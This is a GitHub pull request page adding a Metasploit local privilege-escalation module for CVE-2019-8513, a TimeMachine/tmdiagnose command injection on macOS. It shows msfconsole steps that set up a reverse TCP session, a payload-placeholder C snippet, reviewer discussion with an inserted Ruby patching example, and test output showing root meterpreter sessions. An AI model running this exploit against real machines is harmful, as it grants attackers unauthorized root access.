
Add exploit for CVE-2019-8513 (TimeMachine cmd injection) #11726

Merged
merged 12 commits into from
Jun 29, 2019

Conversation

timwr (Contributor) commented Apr 14, 2019

Initial commit of CVE-2019-8513. Ping @ChiChou

Verification

  • Start msfconsole
  • Get a (user) session on OSX < 10.14.4
  • Run the module:
use exploit/osx/local/timemachine_cmd_injection 
set SESSION -1
set LHOST <tab>
set LPORT 4445
exploit 
  • Verify you get a new session as root
  • Document the thing and how it works

@timwr timwr added module blocked Blocked by one or more additional tasks needs-docs osx labels Apr 14, 2019
timwr (Contributor, Author) commented Apr 14, 2019

  1. Currently there is an issue with cmd_exec when using osx/x64/meterpreter/reverse_tcp, which causes the exploit not to work on that session type. python meterpreter is working however.
  2. The exploit cleanup ejects all drives (so any thumb drives you have attached will be ejected), maybe @ChiChou can help fix this. We know the drive label so it shouldn't be too hard to look that up and eject only that drive.

Review thread on modules/exploits/osx/local/timemachine_cmd_injection.rb (outdated, resolved):

def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X TimeMachine Command Injection Privilege Escalation',
Reviewer (Contributor):

I'd like to think this won't be the last command injection LPE in TimeMachine. Perhaps mention tmdiagnose in the title, or something else unique and more applicable.

modules/exploits/osx/local/timemachine_cmd_injection.rb: three further review threads (outdated, resolved)

#include <sys/mman.h>

char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";
Reviewer (Contributor):

This approach is likely problematic in the unlikely event that the payload is larger than 1024. If it is in fact problematic, then it may be difficult to debug, as the cause won't be immediately obvious, due to clobbering adjacent binary data.

This also results in the payload being written to disk, rather than writing the exploit to disk and executing the payload in memory.

Potential alternatives:

  • adjusting the exploit to accept a command line argument to execute; or
  • adjusting the exploit to spawn a setuid(0,0,0) shell, if feasible, and piping the payload as input through STDIN; or
  • lazy option: adding a warning/error to the exploit method in the event that the generated payload is larger than 1024.

timwr (Contributor, Author):

It's actually tmdiagnose that calls back and executes our payload (without any arguments) so there is no way to avoid having some kind of payload on disk. (Unless you can think of a way?).
I'll see if I can pipe the python/command payload through stdin and also add a length check.

Reviewer (Contributor):

🤷 I haven't looked at how the exploit works at all. A closer look reveals the x64 payload obviously can't be piped, unless it's already written to disk, which is less preferable.

Simply adding a length check might be the easiest way.
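The review thread above turns on one failure mode: the compiled helper reserves a fixed array (the snippet shows `char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";`), and a payload longer than that array silently overwrites whatever the compiler placed after it, which is exactly the hard-to-debug clobbering the reviewer describes. The following Ruby is an added example, not code from this PR or from the Metasploit module: it implements the "length check" option as a placeholder-patching routine that refuses oversize payloads, pads the whole array with NUL so adjacent bytes are untouched, and checks that the marker exists exactly once. `PLACEHOLDER` and `BUFFER_SIZE` follow the snippet; `sample_binary` is a constructed stand-in for the compiled file, not a real Mach-O.

```ruby
# Added example, not the module's code. Models the reviewer's suggested
# length check for a fixed-size placeholder array in a compiled binary.
# PLACEHOLDER and BUFFER_SIZE follow the snippet quoted in the review
# (`char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";`).

PLACEHOLDER = "ROOT_PAYLOAD_PLACEHOLDER".b.freeze
BUFFER_SIZE = 1024

class PayloadTooLarge < StandardError; end

# Largest payload the array can hold, leaving one byte for the C NUL terminator.
def max_payload_size
  BUFFER_SIZE - 1
end

# Replace the placeholder with +payload+, NUL-padding the entire array so the
# bytes the compiler placed after it are left exactly as they were.
# Raises instead of silently clobbering adjacent data.
def patch_placeholder(binary, payload)
  binary  = binary.b
  payload = payload.b

  if payload.bytesize > max_payload_size
    raise PayloadTooLarge,
          "payload is #{payload.bytesize} bytes; array holds at most #{max_payload_size}"
  end
  # A NUL inside the payload would terminate the C string early.
  raise ArgumentError, 'payload must not contain NUL' if payload.include?("\x00")

  offset = binary.index(PLACEHOLDER)
  raise ArgumentError, 'placeholder not found' if offset.nil?
  if binary.index(PLACEHOLDER, offset + 1)
    raise ArgumentError, 'placeholder occurs more than once'
  end
  if offset + BUFFER_SIZE > binary.bytesize
    raise ArgumentError, 'array extends past end of binary'
  end

  patched = binary.dup
  # Overwrite exactly BUFFER_SIZE bytes: payload, then zero fill.
  patched[offset, BUFFER_SIZE] = payload.ljust(BUFFER_SIZE, "\x00")
  patched
end

# Constructed stand-in for the compiled binary: bytes before the array, the
# array as the compiler lays it out (placeholder followed by zero fill), and
# bytes after it that a careless patch would clobber.
def sample_binary
  "header-and-code".b +
    PLACEHOLDER.ljust(BUFFER_SIZE, "\x00") +
    "adjacent-data-that-must-survive".b
end

if __FILE__ == $PROGRAM_NAME
  bin = sample_binary
  out = patch_placeholder(bin, "echo hello")
  puts "patched size #{out.bytesize}, trailing data intact: " \
       "#{out.end_with?('adjacent-data-that-must-survive'.b)}"
  begin
    patch_placeholder(bin, "A" * BUFFER_SIZE)
  rescue PayloadTooLarge => e
    puts "rejected: #{e.message}"
  end
end
```

The size check is the whole point: without it `patched[offset, BUFFER_SIZE] = ...` would have to become an unbounded overwrite, and anything the compiler placed after `root_payload` would be corrupted with no obvious symptom.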

bcoles and others added 2 commits April 21, 2019 19:59
Co-Authored-By: timwr <timwr@users.noreply.github.com>
Co-Authored-By: timwr <timwr@users.noreply.github.com>
@timwr timwr removed blocked Blocked by one or more additional tasks needs-docs labels Apr 22, 2019
busterb (Member) commented Jun 29, 2019

If you can rebase on master, the Travis issues in this PR are resolved upstream.

busterb (Member) commented Jun 29, 2019

Been testing a few versions. 10.11.6 appeared vulnerable but did not work:

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Uploading file: '/tmp/.auprhsjdiuv'
[*] Executing exploit '/tmp/.auprhsjdiuv'
[*] Exploit result:
2019-06-29 02:19:08.738 .auprhsjdiuv[483:17255] creating dmg image
2019-06-29 02:19:12.838 .auprhsjdiuv[483:17255] mounting malformed disk
2019-06-29 02:19:14.126 .auprhsjdiuv[483:17255] sending XPC msg
2019-06-29 02:19:14.127 .auprhsjdiuv[483:17255] now wait a few minutes for the root command to run
[*] Exploit completed, but no session was created.

10.13.3 worked great:

meterpreter > sysinfo
Computer     : vagrants-MacBook-Pro.local
OS           : macOS High Sierra (macOS 10.13.3)
Architecture : x86
BuildTuple   : 
Meterpreter  : x64/osx
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

Mojave worked fine too.

@busterb busterb changed the title Initial commit of CVE-2019-8513 (TimeMachine cmd injection) Add exploit for CVE-2019-8513 (TimeMachine cmd injection) Jun 29, 2019
@busterb busterb self-assigned this Jun 29, 2019
@busterb busterb merged commit d20801c into rapid7:master Jun 29, 2019
busterb added a commit that referenced this pull request Jun 29, 2019
busterb (Member) commented Jun 29, 2019

Release Notes

An exploit module that targets a command injection vulnerability in TimeMachine on macOS <= 10.14.3 is now available. It will run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 can be exploited by creating a specially crafted disk label.

busterb (Member) commented Jun 29, 2019

Thanks @timwr @bcoles and @ChiChou

ChiChou commented Jun 30, 2019

Been testing a few versions. 10.11.6 appeared vulnerable but did not work:

10.11.6 is not vulnerable. It only works from Sierra (10.12.x) - Mojave (10.14.3)

@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 22, 2019
Labels: module, osx, rn-modules (release notes for new or majorly enhanced modules)

5 participants